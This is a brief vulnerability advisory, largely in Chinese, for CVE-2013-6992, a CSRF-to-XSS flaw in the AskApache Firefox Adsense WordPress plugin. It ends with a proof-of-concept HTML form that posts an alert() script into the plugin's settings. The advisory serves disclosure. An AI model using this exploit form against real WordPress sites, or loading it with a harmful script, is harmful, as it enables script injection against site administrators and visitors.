CVE ID:CVE-2013-6992
WordPress是一款内容管理系统。
由于 "/wp-admin/options-general.php"脚本未充分验证HTTP请求源,远程攻击者可以欺骗管理员访问含有CSRF代码的恶意链接,在受影响网站的浏览器上下文中执行任意HTML和脚本代码。
0
Wordpress AskApache Firefox Adsense<=3.0
官方禁用易受攻击的插件。
The exploitation example below injects JavaScript code, which uses the "alert()" function to display "immuniweb" word:
<form action="http://[host]/wp-admin/options-general.php?page=askapache-firefox-adsense.php" method="post" name="main">
<input type="hidden" name="aafireadcode" value='<script>alert("immuniweb");</script>'>
<input type="submit" id="btn">
</form>